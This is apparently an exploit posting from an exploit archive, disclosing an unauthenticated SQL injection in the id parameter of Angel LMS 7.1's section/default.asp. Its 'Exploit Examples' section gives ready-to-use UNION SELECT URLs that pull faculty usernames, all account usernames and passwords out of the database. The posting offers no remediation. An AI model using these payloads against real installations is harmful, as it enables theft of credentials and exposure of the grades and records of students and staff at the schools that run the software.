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Angel LMS 7.1 (default.asp id) Remote SQL Injection Vulnerability

Craig Heffner
Security Risk Unsored
web applications
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Angel LMS 7.1 (default.asp id) Remote SQL Injection Vulnerability

# Application:
#		Angel Learning Management Suite 7.1
#		http://www.angellearning.com
# Description:
#		"ANGEL LMS is an inclusive suite of enterprise 
#		learning management tools that balances ease of 
#		use with powerful capabilities to deliver leading 
#		edge teaching and learning, impact learner success 
#		and measure effectiveness."
#		Basically, Angel is a CMS for education, providing
#		online forums, grading, email, chat, etc to faculty
#		and students. It is used as the primary Web interface
#		for several online schools and courses.
# Vulnerability:
#		Angel 7.1 contains an SQL injection vulnerability in 
#		section/default.asp that grants an un-authenticated user 
#		access to all database tables and data. Examples include 
#		enumeration of tables, columns, user names, passwords, 
#		grades, and test questions/answers (you basically have 
#		access to everything).
# Exploit Examples:
#	#Enumerate Faculty User Accounts#
#		http://[Angel Root Directory]/section/default.asp?id='%20union%20select%20top%201%20username%20from%20faculty_accounts--"
#	#Enumerate All User Accounts#
#		http://[Angel Root Directory]/section/default.asp?id='%20union%20select%20top%201%20username%20from%20accounts--"
#	#Enumerate Account Passwords#
#		http://[Angel Root Directory]/section/default.asp?id='%20union%20select%20top%201%20password%20from%20accounts--"

#  0day.today [2024-07-02]  #